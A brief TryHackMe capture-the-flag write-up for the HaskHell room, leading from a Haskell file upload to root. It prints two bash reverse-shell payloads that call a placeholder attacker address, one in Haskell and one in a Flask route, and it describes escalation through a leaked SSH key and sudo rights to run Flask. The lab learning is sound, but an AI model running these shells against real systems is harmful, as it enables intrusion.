HaskHell - THM

This room nudges you fairly clearly in the right directions, thus the short writeup, straight to the point as always. When you start off, you have two open ports, SSH and HTTP (although on an uncommon port). The professor's website clearly states you have the opportunity to upload some haskell. Find the directory where you can upload with some busting. If you, like me at the time of this writing, are no Haskell programmer, Google is your friend. Here I paste the code I used as upload material to obtain a reverse shell:

module Main where
import System.Process

main = callCommand "bash -i >& /dev/tcp/<ip>/<port> 0>&1"

Once you get the reverse shell, grab your first flag (and stabilize the shell, as always). Look around a little, there is a clear opportunity to obtain a shell as user prof by using his private ssh key to log into the system. Once you are prof, check your sudo permissions: you can run any Flask app as root. The path should be clear, let's build a Flask app that gets us a shell as root. My idea was fairly simple, I paste it here:

from flask import Flask
import os
app = Flask(__name__)

@app.route("/")
def index():
    os.system("bash -c 'bash -i >& /dev/tcp/<ip>/<port> 0>&1'")

Once you launch this app (run sudo /usr/bin/flask run AFTER having exported the FLASK_APP environment variable with the name of your python app), navigate to the newly launched app on localhost:5000 to have this code executed. If you where listening on the port you put in the app code, you should have your root shell by now. Merry hacking.